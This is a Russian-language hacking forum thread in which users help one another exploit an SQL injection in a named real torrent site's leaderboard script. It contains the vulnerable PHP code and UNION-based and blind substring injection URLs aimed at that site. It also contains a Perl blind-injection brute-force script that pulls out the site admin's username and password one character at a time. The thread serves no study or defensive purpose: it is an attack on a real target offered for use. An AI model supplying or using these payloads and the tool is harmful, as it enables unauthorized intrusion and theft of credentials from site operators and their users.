Нашел иньекцию в скрипте на сайте, долго перебирал колличество полей для выборки, ничего не получилось(всегда пишет The used SELECT statements have a different number of columns). Погуглив по параметрам скрипта нашел движок, оттуда достал весь запрос : SELECT * FROM flashscores WHERE game = ".$gameID." ORDER BY score DESC LIMIT 10; Так-же достоверно узнал колличество полей: 5 Подскажите, как правильно составить sql inj? PHP: <? if(isset($_GET["gameid"])) { $gameID=$_GET["gameid"]; $sql = "SELECT * FROM flashscores WHERE game = ".$gameID." ORDER BY score DESC LIMIT 10;<br>"; $result = MySQL_QUERY($sql); echo "111:".$sql; while($scores = MySQL_FETCH_ARRAY($result)) { $userresult = MySQL_QUERY("SELECT * FROM users WHERE id = ".$scores["user"].";"); $user = MySQL_FETCH_ARRAY($userresult); $username = $user["username"]; $ranking = MySQL_QUERY("SELECT COUNT(*) FROM flashscores WHERE game = ".$gameID." AND score > ".$scores["score"].";") OR DIE(MySQL_ERROR()); if($rankrow = mysql_fetch_row($ranking)) { $rank = $rankrow[0]+1; }else{ $rank = 1; } if($gameID < 9) { if($scores["user"]==$CURUSER["id"]) { print("<TR style=\"background-color: #BBBBBB\"><TD>".$rank."</TD><TD WIDTH=75%>".$username."</TD><TD><div style=\"text-align:right;width:100%;\">".$scores["score"]."</div></TD></TR>"); }else{ print("<TR><TD>".$rank."</TD><TD>".$username."</TD><TD><div style=\"text-align:right;width:100%;\">".$scores["score"]."</div></TD></TR>"); } }else{ if($scores["user"]==$CURUSER["id"]) { print("<TR style=\"background-color: #BBBBBB\"><TD>".$rank."</TD><TD WIDTH=75%>".$username."</TD><TD>".$scores["level"]."</TD><TD><div style=\"text-align:right;width:100%;\">".$scores["score"]."</div></TD></TR>"); }else{ print("<TR><TD>".$rank."</TD><TD>".$username."</TD><TD>".$scores["level"]."</TD><TD><div style=\"text-align:right;width:100%;\">".$scores["score"]."</div></TD></TR>"); } } } $sql = "SELECT * FROM flashscores WHERE game = ".$gameID." AND user = ".$CURUSER["id"]." ORDER BY score DESC LIMIT 1;"; echo "222:".$sql; $yourresult = MySQL_QUERY($sql) OR DIE(MySQL_ERROR()); if($yourscore = MySQL_FETCH_ARRAY($yourresult)) { $yourhighscore = $yourscore["score"]; $yourlevel = $yourscore["level"]; $yourranking = MySQL_QUERY("SELECT COUNT(*) FROM flashscores WHERE game = ".$gameID." AND score > ".$yourhighscore.";") OR DIE(MySQL_ERROR()); if($ranking = mysql_fetch_row($yourranking)) { $yourrank = $ranking[0]+1; }else{ $yourrank = 1; } if($yourrank>10) { if($gameID < 9) { print("<TR style=\"background-color: #BBBBBB\"><TD>".$yourrank."</TD><TD WIDTH=75%>".$CURUSER["username"]."</TD><TD><div style=\"text-align:right;width:100%;\">".$yourhighscore."</div></TD></TR>"); }else{ print("<TR style=\"background-color: #BBBBBB\"><TD>".$yourrank."</TD><TD WIDTH=75%>".$CURUSER["username"]."</TD><TD>".$yourlevel."</TD><TD><div style=\"text-align:right;width:100%;\">".$yourhighscore."</div></TD></TR>"); } } } print("</TABLE><P>"); }else{ print("<TABLE WIDTH=100%><TR><TD><center><B>".$_GET["gamename"]."</B></center></TD></TR>"); print("<TR><TD>Sorry, we cannot save scores of this game!</TD></TR>"); print("</TABLE>"); } end_table(); ?>
flash.php?gameid=-1+union+select+1,2,3,4,5/* и юзаешь поле, которое выводится add вот например http://geotorrents.com/flash.php?gameURI=snake.swf&gamename=Snake&gameid=0x3927%20union%20select%201,2,3,4,5/* только ничего не выводится...
Запрос возвращает несколько результатов (с 5ью полями и с 1 (count()), поэтому вывода не будет. посимвольный идет на ура http://geotorrents.com/flash.php?gameURI=snake.swf&gamename=Snake&gameid=1+and+substring(version(),1,1)=5/*
Вот пример сплоита , заюзай тока со своей скулей! Code: #!/usr/bin/perl -w use IO::Socket; use strict; # # Benchmark brute sql tool # my $delay = "80000"; my $stp =0; my $host = ""; -------урл хоста my $dir = ""; ------директория if ($ARGV[2] ) { $delay = $ARGV[2]; } print "\nTarget url : ".$host.$dir."\n\n"; $host =~ s/(http:\/\/)//; my @array = ("username","password"); ---название columns в бд print "--== Trying to perform sql injection ==--\n\n"; sleep(1); &sploit(); sub sploit() { my $x = ""; my $i = ""; my $string = ""; my $res = "1"; for ( $x=0; $x<=$#array; $x++ ) { my $j = 1; $res = 1; while ($res) { for ($i=32;$i<=127;$i++) { $res = 0; if ( $x eq 1 ) { next if ( $i < 48 ); next if ( ( $i > 57 ) and ( $i < 97 ) ); next if ( $i > 102 ); } my $val = "пУТЬ ДО СКУЛИ ВИДА (index.php?id=1')"; my $tmp = "И САМА СКУЛЮ ДЛЯ ПЕРЕБОРА"; $tmp =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg; $val .= $tmp; my $data=$dir.$val; my $start = time(); my $req = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "Error - connection failed\n\n"; print $req "GET $data HTTP/1.1\r\n"; print $req "Host: $host\r\n"; print $req "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 (GNU Linux)\r\n"; print $req "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; print $req "Accept-Language: en-us;q=0.7,en;q=0.3\r\n"; print $req "Accept-Encoding: gzip,deflate\r\n"; print $req "Keep-Alive: 300\r\n"; print $req "Connection: Keep-Alive\r\n"; print $req "Cache-Control: no-cache\r\n"; print $req "Connection: close\r\n\r\n"; while (my $result = <$req>) { if ( $result =~ /Subquery returns more than/ ) { $string .= chr($i); print "\n\tFound : ".chr($i)."\n\n"; $res = 1; $stp=1; } if ( $result =~ /404 Not Found/ ) { printf "\n\nFile not found.\n\n"; print "\n\n$result\n\n"; exit; } if ( $result =~ /400 Bad Request/ ) { printf "\n\nBad request.\n\n"; print "\n\n$result\n\n"; exit; } } if($stp > 0) { $stp=0; last; } my $end = time(); my $dft = $end - $start; print "$dft sec "; print "\tTrying : ".chr($i)."\n"; } $j++; if ( !$res ) { $array[$x] = $string; $string = ""; } } } print "\n----------------------\n"; print "Admin username : $array[0]\n"; print "Admin password : $array[1]\n\n"; } sub usage() { print "\n \n"; print " \n"; print " \n\n"; print "ay\n"; print "by fly\n\n"; exit(); }
помниться была такая утилита. для автоматизации проведения слепых sql inj. могу выложить sqlmap называлась кажись.
